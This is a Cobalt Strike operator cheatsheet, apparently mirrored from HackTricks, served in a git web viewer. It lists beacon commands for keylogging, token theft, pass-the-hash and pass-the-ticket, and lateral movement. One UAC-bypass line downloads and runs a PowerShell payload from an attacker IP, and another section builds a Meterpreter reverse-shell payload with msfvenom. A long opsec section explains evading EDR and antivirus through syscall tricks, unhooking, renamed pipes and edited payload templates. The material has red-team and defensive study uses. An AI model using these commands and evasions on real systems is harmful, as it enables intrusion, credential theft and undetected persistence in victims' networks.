daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

cobalt-strike.md (25129B)


      1 ---
      2 title: "Cobalt Strike"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/cobalt-strike.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/cobalt-strike.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Cobalt Strike
     14 
     15 ### Listeners
     16 
     17 ### C2 Listeners
     18 
     19 `Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
     20 
     21 ### Peer2Peer Listeners
     22 
     23 The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
     24 
     25 `Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons
     26 
     27 * The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon
     28 * The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`.
     29 
     30 ### Generate & Host payloads
     31 
     32 #### Generate payloads in files
     33 
     34 `Attacks -> Packages ->`
     35 
     36 * **`HTMLApplication`** for HTA files
     37 * **`MS Office Macro`** for an office document with a macro
     38 * **`Windows Executable`** for a .exe, .dll orr service .exe
     39 * **`Windows Executable (S)`** for a **stageless** .exe, .dll or service .exe (better stageless than staged, less IoCs)
     40 
     41 #### Generate & Host payloads
     42 
     43 `Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
     44 
     45 #### Host Payloads
     46 
     47 If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
     48 
     49 ### Beacon Options
     50 
     51 <details>
     52 <summary>Beacon options and commands</summary>
     53 
     54 ```bash
     55 # Execute local .NET binary
     56 execute-assembly </path/to/executable.exe>
     57 # Note that to load assemblies larger than 1MB, the 'tasks_max_size' property of the malleable profile needs to be modified.
     58 
     59 # Screenshots
     60 printscreen    # Take a single screenshot via PrintScr method
     61 screenshot     # Take a single screenshot
     62 screenwatch    # Take periodic screenshots of desktop
     63 ## Go to View -> Screenshots to see them
     64 
     65 # keylogger
     66 keylogger [pid] [x86|x64]
     67 ## View > Keystrokes to see the keys pressed
     68 
     69 # portscan
     70 portscan [pid] [arch] [targets] [ports] [arp|icmp|none] [max connections] # Inject portscan action inside another process
     71 portscan [targets] [ports] [arp|icmp|none] [max connections]
     72 
     73 # Powershell
     74 ## Import Powershell module
     75 powershell-import C:\path\to\PowerView.ps1
     76 powershell-import /root/Tools/PowerSploit/Privesc/PowerUp.ps1
     77 powershell <just write powershell cmd here> # Uses the highest supported PowerShell version (not OPSEC-friendly)
     78 powerpick <cmdlet> <args> # This creates a sacrificial process specified by spawnto, and injects UnmanagedPowerShell into it for better opsec (not logging)
     79 powerpick Invoke-PrivescAudit | fl
     80 psinject <pid> <arch> <commandlet> <arguments> # This injects UnmanagedPowerShell into the specified process to run the PowerShell cmdlet.
     81 
     82 
     83 # User impersonation
     84 ## Token generation with creds
     85 make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
     86 ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
     87 rev2self # Stop using token generated with make_token
     88 ## The use of make_token generates event 4624: An account was successfully logged on.  This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type.  As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
     89 
     90 # UAC Bypass
     91 elevate svc-exe <listener>
     92 elevate uac-token-duplication <listener>
     93 runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
     94 
     95 ## Steal token from pid
     96 ## Like make_token but stealing the token from a process
     97 steal_token [pid] # Also, this is useful for network actions, not local actions
     98 ## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
     99 ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
    100 rev2self # Stop using token from steal_token
    101 
    102 ## Launch process with nwe credentials
    103 spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
    104 ## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE).  It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
    105 
    106 ## Inject into process
    107 inject [pid] [x64|x86] [listener]
    108 ## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
    109 
    110 ## Pass the hash
    111 ## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
    112 pth [pid] [arch] [DOMAIN\user] [NTLM hash]
    113 pth [DOMAIN\user] [NTLM hash]
    114 
    115 ## Pass the hash through mimikatz
    116 mimikatz sekurlsa::pth /user:<username> /domain:<DOMAIN> /ntlm:<NTLM HASH> /run:"powershell -w hidden"
    117 ## Without /run, Mimikatz spawns cmd.exe; an interactive desktop user may see the shell (SYSTEM sessions are not normally visible)
    118 steal_token <pid> #Steal token from process created by mimikatz
    119 
    120 ## Pass the ticket
    121 ## Request a ticket
    122 execute-assembly /root/Tools/SharpCollection/Seatbelt.exe -group=system
    123 execute-assembly C:\path\Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes_keys> /nowrap /opsec
    124 ## Create a new logon session to use with the new ticket (to not overwrite the compromised one)
    125 make_token <domain>\<username> DummyPass
    126 ## Write the ticket on the attacker machine from a PowerShell session and load it
    127 [System.IO.File]::WriteAllBytes("C:\Users\Administrator\Desktop\jkingTGT.kirbi", [System.Convert]::FromBase64String("[...ticket...]"))
    128 kerberos_ticket_use C:\Users\Administrator\Desktop\jkingTGT.kirbi
    129 
    130 ## Pass the ticket from SYSTEM
    131 ## Generate a new process with the ticket
    132 execute-assembly C:\path\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:<AES KEY> /nowrap /opsec /createnetonly:C:\Windows\System32\cmd.exe
    133 ## Steal the token from that process
    134 steal_token <pid>
    135 
    136 ## Extract ticket + Pass the ticket
    137 ### List tickets
    138 execute-assembly C:\path\Rubeus.exe triage
    139 ### Dump an interesting ticket by LUID
    140 execute-assembly C:\path\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
    141 ### Create new logon session, note luid and processid
    142 execute-assembly C:\path\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe
    143 ### Insert ticket in generate logon session
    144 execute-assembly C:\path\Rubeus.exe ptt /luid:0x92a8c /ticket:[...base64-ticket...]
    145 ### Finally, steal the token from that new process
    146 steal_token <pid>
    147 
    148 # Lateral Movement
    149 ## If a token was created it will be used
    150 jump [method] [target] [listener]
    151 ## Methods:
    152 ## psexec                    x86   Use a service to run a Service EXE artifact
    153 ## psexec64                  x64   Use a service to run a Service EXE artifact
    154 ## psexec_psh                x86   Use a service to run a PowerShell one-liner
    155 ## winrm                     x86   Run a PowerShell script via WinRM
    156 ## winrm64                   x64   Run a PowerShell script via WinRM
    157 ## wmi_msbuild               x64   WMI lateral movement with an MSBuild inline C# task (OPSEC)
    158 
    159 
    160 remote-exec [method] [target] [command] # remote-exec doesn't return output
    161 ## Methods:
    162 ## psexec                          Remote execute via Service Control Manager
    163 ## winrm                           Remote execute via WinRM (PowerShell)
    164 ## wmi                             Remote execute via WMI
    165 
    166 ## To execute a beacon with wmi (it isn't in the jump command) just upload the beacon and execute it
    167 beacon> upload C:\Payloads\beacon-smb.exe
    168 beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
    169 
    170 
    171 # Pass session to Metasploit - Through listener
    172 ## On the Metasploit host
    173 msf6 > use exploit/multi/handler
    174 msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
    175 msf6 exploit(multi/handler) > set LHOST eth0
    176 msf6 exploit(multi/handler) > set LPORT 8080
    177 msf6 exploit(multi/handler) > exploit -j
    178 
    179 ## On cobalt: Listeners > Add and set the Payload to Foreign HTTP. Set the Host to 10.10.5.120, the Port to 8080 and click Save.
    180 beacon> spawn metasploit
    181 ## You can only spawn x86 Meterpreter sessions with the foreign listener.
    182 
    183 # Pass session to Metasploit - Through shellcode injection
    184 ## On metasploit host
    185 msfvenom -p windows/x64/meterpreter_reverse_http LHOST=<IP> LPORT=<PORT> -f raw -o /tmp/msf.bin
    186 ## Run msfvenom and prepare the multi/handler listener
    187 
    188 ## Copy bin file to cobalt strike host
    189 ps
    190 shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
    191 
    192 # Pass metasploit session to cobalt strike
    193 ## Generate stageless Beacon shellcode: go to Attacks > Packages > Windows Executable (S), select the listener, choose Raw output, and enable the x64 payload.
    194 ## Use post/windows/manage/shellcode_inject in metasploit to inject the generated cobalt srike shellcode
    195 
    196 
    197 # Pivoting
    198 ## Open a socks proxy in the teamserver
    199 beacon> socks 1080
    200 
    201 # SSH connection
    202 beacon> ssh 10.10.17.12:22 username password
    203 ```
    204 
    205 </details>
    206 
    207 ### Custom implants / Linux Beacons
    208 
    209 - A custom agent only needs to speak the Cobalt Strike Team Server HTTP/S protocol (default malleable C2 profile) to register/check-in and receive tasks. Implement the same URIs/headers/metadata crypto defined in the profile to reuse the Cobalt Strike UI for tasking and output.<sup>[[1]](#references)[[4]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
    210 - An Aggressor Script (e.g., `CustomBeacon.cna`) can wrap payload generation for the non-Windows beacon so operators can select the listener and produce ELF payloads directly from the GUI.
    211 - Example Linux task handlers exposed to the Team Server: `sleep`, `cd`, `pwd`, `shell` (exec arbitrary commands), `ls`, `upload`, `download`, and `exit`. These map to task IDs expected by the Team Server and must be implemented server-side to return output in the proper format.
    212 - BOF support on Linux can be added by loading Beacon Object Files in-process with [TrustedSec's ELFLoader](https://github.com/trustedsec/ELFLoader) (supports Outflank-style BOFs too), allowing modular post-exploitation to run inside the implant's context/privileges without spawning new processes.<sup>[[2]](#references)[[3]](#references)</sup>
    213 - Embed a SOCKS handler in the custom beacon to keep pivoting parity with Windows Beacons: when the operator runs `socks <port>` the implant should open a local proxy to route operator tooling through the compromised Linux host into internal networks.
    214 
    215 ## Opsec
    216 
    217 ### Execute-Assembly
    218 
    219 The **`execute-assembly`** uses a **sacrificial process** using remote process injection to execute the indicated program. This is very noisy as to inject inside a process certain Win APIs are used that every EDR is checking. However, there are some custom tools that can be used to load something in the same process:
    220 
    221 - [https://github.com/anthemtotheego/InlineExecute-Assembly](https://github.com/anthemtotheego/InlineExecute-Assembly)
    222 - [https://github.com/kyleavery/inject-assembly](https://github.com/kyleavery/inject-assembly)
    223 - In Cobalt Strike you can also use BOF (Beacon Object Files): [https://github.com/CCob/BOF.NET](https://github.com/CCob/BOF.NET)
    224 
    225 The agressor script `https://github.com/outflanknl/HelpColor` will create the `helpx` command in Cobalt Strike which will put colors in commands indicating if they are BOFs (green), if they are Frok&Run (yellow) and similar, or if they are ProcessExecution, injection or similar (red). Which helps to know which commands are more stealthy.
    226 
    227 ### Modern in-process post-execution
    228 
    229 Recent versions add two alternatives when a classic COFF BOF is too constrained:
    230 
    231 - **Beacon Interpreter** compiles C on the Team Server to intermediate bytecode and executes it in a VM embedded in Beacon. The bytecode remains data rather than native executable code, so this avoids the extra executable allocation and RW-to-RX permission transition normally required to load a BOF. Scripts can import the Beacon API and declare BOF-style Dynamic Function Resolution (DFR) prototypes.
    232 - **BOF-PE** loads a complete EXE or DLL in the current Beacon. This format supports normal PE imports, exception handling, richer C++ and external libraries while retaining the Beacon API. This is heavier than a small COFF BOF, so choose it only when the additional runtime is useful.
    233 
    234 ```bash
    235 # Compile a C script on the Team Server and execute its bytecode
    236 beacon-interpreter /path/to/script.c
    237 
    238 # Execute a BOF-PE in the current Beacon
    239 inline-execute-pe /path/to/tool.x64.exe
    240 ```
    241 
    242 These mechanisms reduce loader-related signals, not the telemetry produced by the script's actions or Windows API calls.<sup>[[8]](#references)</sup>
    243 
    244 ### Act as the user
    245 
    246 You could check events like `Seatbelt.exe LogonEvents ExplicitLogonEvents PoweredOnEvents`: 
    247 
    248 - Security EID 4624 - Check all the interactive logons to know the usual operating hours.
    249 - System EID 12,13 - Check the shutdown/startup/sleep frequency.
    250 - Security EID 4624/4625 - Check inbound valid/invalid NTLM attempts.
    251 - Security EID 4648 - This event is created when plaintext credentials are used to logon. If a process generated it, the binary potentially has the credentials in clear text ina  config file or inside the code.
    252 
    253 When using `jump` from cobalt strike, it's better to use the `wmi_msbuild` method to make the new process look more legit.
    254 
    255 ### Use computer accounts
    256 
    257 It's common for defenders to be checking weird behaviours generated from users abd **exclude service accounts and computer accounts like `*$` from their monitoring**. You could use these accounts to perform lateral movement or privilege escalation.
    258 
    259 ### Use stageless payloads
    260 
    261 Stageless payloads are less noisy than staged ones because they don't need to download a second stage from the C2 server. This means that they don't generate any network traffic after the initial connection, making them less likely to be detected by network-based defenses.
    262 
    263 ### Tokens & Token Store
    264 
    265 Be careful when stealing or generating tokens because an EDR may enumerate thread tokens and detect a **token belonging to a different user** or even SYSTEM inside the process.
    266 
    267 This allows to store tokens **per beacon** so it's not needed to steal the same token again and again. This is useful for lateral movement or when you need to use a stolen token multiple times:
    268 
    269 - `token-store steal <pid>`
    270 - `token-store steal-and-use <pid>`
    271 - token-store show
    272 - `token-store use <id>`
    273 - `token-store remove <id>`
    274 - token-store remove-all
    275 
    276 When moving laterally, usually is better to **steal a token than to generate a new one** or perform a pass the hash attack.
    277 
    278 ### Guardrails
    279 
    280 Cobalt Strike has a feature called **Guardrails** that helps to prevent the use of certain commands or actions that could be detected by defenders. Guardrails can be configured to block specific commands, such as `make_token`, `jump`, `remote-exec`, and others that are commonly used for lateral movement or privilege escalation.
    281 
    282 Moreover, the repo [https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks](https://github.com/Arvanaghi/CheckPlease/wiki/System-Related-Checks) also contains some checks and ideas you could consider before executing a payload.
    283 
    284 ### Tickets encryption
    285 
    286 In an AD be careful with the encryption of the tickets. By default, some tools will use RC4 encryption for Kerberos tickets, which is less secure than AES encryption and by default up to date environments will use AES. This can be detected by defenders who are monitoring for weak encryption algorithms.
    287 
    288 ### Avoid Defaults
    289 
    290 When using Cobalt Stricke by default the SMB pipes will have the name `msagent_####` and `"status_####`. Change those names. It's possible to check the names of the existing pipes from Cobal Strike with the command: `ls \\.\pipe\`
    291 
    292 Moreover, with SSH sessions a pipe called `\\.\pipe\postex_ssh_####` is created. Chage it with `set ssh_pipename "<new_name>";`.
    293 
    294 Also in poext exploitation attack the pipes `\\.\pipe\postex_####` can be modified with `set pipename "<new_name>"`.
    295 
    296 In Cobalt Strike profiles you can also modify things like:
    297 
    298 - Avoiding using `rwx`
    299 - How the process injection behavior works (which APIs will be used) in the `process-inject {...}` block
    300 - How the "fork and run" works in the `post-ex {…}` block
    301 - The sleep time
    302 - The max size of binaries to be loaded in memory
    303 - The memory footprint and DLL content with `stage {...}` block
    304 - The network traffic
    305 
    306 ### Sleepmask and BeaconGate
    307 
    308 A Sleepmask transforms Beacon and its tracked heap allocations while it is dormant, then restores them for task execution. Current releases provide an evasive default, but custom Sleepmask BOFs remain useful when memory layout, allocation or call-stack requirements differ. As of 4.13, the default Sleepmask also spoofs the return address for APIs proxied through BeaconGate.<sup>[[8]](#references)</sup>
    309 
    310 **BeaconGate** extends this design beyond `Sleep`: selected WinAPI calls are represented as `FUNCTION_CALL` structures and forwarded to the Sleepmask BOF, which can mask Beacon while executing the call. The profile can gate a group (`Comms`, `Core`, `Cleanup` or `All`) or only individual APIs:<sup>[[9]](#references)</sup>
    311 
    312 ```text
    313 stage {
    314     set sleep_mask "true";
    315     set syscall_method "Indirect";
    316 
    317     beacon_gate {
    318         VirtualAlloc;       # Routed through BeaconGate
    319         VirtualAllocEx;
    320         InternetConnectA;
    321     }
    322 }
    323 ```
    324 
    325 For an API listed under `beacon_gate`, the gate takes precedence over `syscall_method`; APIs not listed can still use the configured syscall method. `beacon_gate disable` and `beacon_gate enable` toggle the feature at runtime. Avoid enabling `All` blindly: commands such as `ps` repeatedly call `OpenProcess`/`CloseHandle` and can produce a CPU spike when every call masks and unmasks Beacon. Sleepmask-VS provides mocked Beacon/Sleepmask state for debugging custom gates without repeatedly testing them through a live implant.<sup>[[9]](#references)</sup>
    326 
    327 ### Noisy proc injections
    328 
    329 When injecting code into a process this is usually very noisy, this is because **no regular process usually performs this action and because the ways to do this are very limited**. Tehrefore, it' could be detected by behaviour-based detection systems. Moroever, it could also be detected by EDRs scanning the network for **threads containing code that is not in disk** (although processes such as browsers using JIT have this commonly). Example: [https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2](https://gist.github.com/jaredcatkinson/23905d34537ce4b5b1818c3e6405c1d2)
    330 
    331 ### Spawnas | PID and PPID relationships
    332 
    333 When spawning a new process it's important to **maintain a regular parent-child** relationship between processes to avoid detection. If svchost.exec is executing iexplorer.exe it'll look suspicious, as svchost.exe is not a parent of iexplorer.exe in a normal Windows environment.
    334 
    335 When a new beacon is spawned in Cobalt Strike by default a process using **`rundll32.exe`** is created to run the new listener. This is not very stealthy and can be easily detected by EDRs. Moreover, `rundll32.exe` is run without any args making it even more suspicious.
    336 
    337 With the following Cobalt Strike command, you can specify a different process to spawn the new beacon, making it less detectable:
    338 
    339 ```bash
    340 spawnto x86 svchost.exe
    341 ```
    342 
    343 You can aso change this setting **`spawnto_x86` and `spawnto_x64`** in a profile.
    344 
    345 ### Proxying attackers traffic
    346 
    347 Atters sometime will need to be able to run tools lically, even in linux machines and make the traffic of the victims reach the tool (e.g. NTLM relay).
    348 
    349 Moreover, sometimes to do a pass-the.hash or pass-the-ticket attack it's stealthier for the attacker to **add this hash or ticket in his own LSASS process** locally and then pivot from it instead of modifying an LSASS process of a victim machine.
    350 
    351 However, you need to be **careful with the generated traffic**, as you might be sending uncommon traffic (kerberos?) from your backdoor process. For this you could pivot to a browser process (although you could get caught injecting yourself into a process so think about a stealth way to do this).
    352 
    353 
    354 ### Avoiding AVs
    355 
    356 #### AV/AMSI/ETW Bypass
    357 
    358 Check the page:
    359 
    360 
    361 [Av Bypass](/hacktricks/windows-hardening/av-bypass)
    362 
    363 
    364 #### Artifact Kit
    365 
    366 Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
    367 
    368 Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
    369 
    370 After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
    371 
    372 ```text
    373 pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
    374 ```
    375 
    376 Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
    377 
    378 #### Resource Kit
    379 
    380 The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
    381 
    382 Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
    383 
    384 ```text
    385 .\ThreatCheck.exe -e AMSI -f .\cobaltstrike\ResourceKit\template.x64.ps1
    386 ```
    387 
    388 Modifying the detected lines one can generate a template that won't be caught.
    389 
    390 Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.
    391 
    392 #### Function hooks | Syscall
    393 
    394 Function hooking is a very common method of ERDs to detect malicious activity. Cobalt Strike allows you to bypass these hooks by using **syscalls** instead of the standard Windows API calls using the **`None`** config, or use the `Nt*` version of a function with the **`Direct`** setting, or just jumping over the `Nt*` function with the **`Indirect`** option in the malleable profile. Depending on the system, an optino might be more stealth then the other.
    395 
    396 This can be set in the profile or suing the command **`syscall-method`**
    397 
    398  However, this could also be noisy.
    399 
    400 Some option granted by Cobalt Strike to bypass function hooks is to remove those hooks with: [**unhook-bof**](https://github.com/Cobalt-Strike/unhook-bof).
    401 
    402 You could also check with functions are hooked with [**https://github.com/Mr-Un1k0d3r/EDRs**](https://github.com/Mr-Un1k0d3r/EDRs) or [**https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector**](https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector)
    403 
    404 
    405 <details>
    406 <summary>Misc Cobalt Strike commands</summary>
    407 
    408 ```bash
    409 cd C:\Tools\neo4j\bin
    410 neo4j.bat console
    411 http://localhost:7474/ --> Change password
    412 execute-assembly C:\Tools\SharpHound3\SharpHound3\bin\Debug\SharpHound.exe -c All -d DOMAIN.LOCAL
    413 
    414 
    415 # Change powershell
    416 C:\Tools\cobaltstrike\ResourceKit
    417 template.x64.ps1
    418 # Change $var_code -> $polop
    419 # $x --> $ar
    420 cobalt strike --> script manager --> Load --> Cargar C:\Tools\cobaltstrike\ResourceKit\resources.cna
    421 
    422 #artifact kit
    423 cd  C:\Tools\cobaltstrike\ArtifactKit
    424 pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
    425 
    426 
    427 ```
    428 
    429 </details>
    430 
    431 
    432 ## References
    433 
    434 - [1] [Cobalt Strike Linux Beacon (custom implant PoC)](https://github.com/EricEsquivel/CobaltStrike-Linux-Beacon)
    435 - [2] [TrustedSec ELFLoader & Linux BOFs](https://github.com/trustedsec/ELFLoader)
    436 - [3] [Outflank nix BOF template](https://github.com/outflanknl/nix_bof_template)
    437 - [4] [Unit42 analysis of Cobalt Strike metadata encryption](https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/)
    438 - [5] [SANS ISC diary on Cobalt Strike traffic](https://isc.sans.edu/diary/27968)
    439 - [6] [cs-decrypt-metadata-py](https://blog.didierstevens.com/2021/10/22/new-tool-cs-decrypt-metadata-py/)
    440 - [7] [SentinelOne CobaltStrikeParser](https://github.com/Sentinel-One/CobaltStrikeParser)
    441 - [8] [Cobalt Strike 4.13: Lost In Translation](https://www.cobaltstrike.com/blog/cobalt-strike-413-lost-in-translation)
    442 - [9] [Cobalt Strike 4.10: Through the BeaconGate](https://www.cobaltstrike.com/blog/cobalt-strike-410-through-the-beacongate?p=6046)